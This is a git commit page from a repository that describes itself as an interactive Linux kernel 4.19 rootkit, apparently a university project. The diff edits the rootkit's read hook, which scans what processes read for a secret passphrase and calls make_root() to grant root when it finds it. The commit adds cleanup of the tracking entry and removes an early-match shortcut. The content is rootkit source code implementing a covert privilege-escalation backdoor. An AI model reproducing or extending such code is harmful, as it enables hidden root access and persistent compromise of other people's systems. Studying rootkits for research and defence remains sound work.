fixes pertinent root bug - linux-rootkit - Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit 197578a53c0e3c75fb19346fa2e39c1884ed5935
parent 6922315e05e92644d7efc3961ae581ed380b4589
Author: deurzen <m.deurzen@tum.de>
Date:   Mon, 30 Nov 2020 04:19:05 +0100

fixes pertinent root bug

Diffstat:
M src/read.c  | 11 ++++-------

1 file changed, 4 insertions(+), 7 deletions(-)
diff --git a/src/read.c b/src/read.c
@@ -103,6 +103,7 @@ handle_compare(char *buf, pid_t pid, size_t size)
 
         if(strnstr(entry->str, PASSPHRASE, MAX_BUF)) {
             make_root();
+            remove_entry(pid);
             return;
         }
 
@@ -114,8 +115,10 @@ handle_compare(char *buf, pid_t pid, size_t size)
         }
     }
 
-    if(strstr(entry->str, PASSPHRASE))
+    if(strstr(entry->str, PASSPHRASE)) {
         make_root();
+        remove_entry(pid);
+    }
 }
 
 void
@@ -132,12 +135,6 @@ handle_pid(pid_t pid, __user char *buf, size_t size)
 
     copy_from_user(str, buf, size);
 
-    //Early return on exact match, avoiding more expensive operations
-    if(strnstr(str, PASSPHRASE, size)) {
-        make_root();
-        return;
-    }
-
     if(is_valid(str, size)) {
         add_entry(pid);
         handle_compare(str, pid, size);

	linux-rootkit Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
	git clone git://git.deurzen.net/linux-rootkit
	Log \| Files \| Refs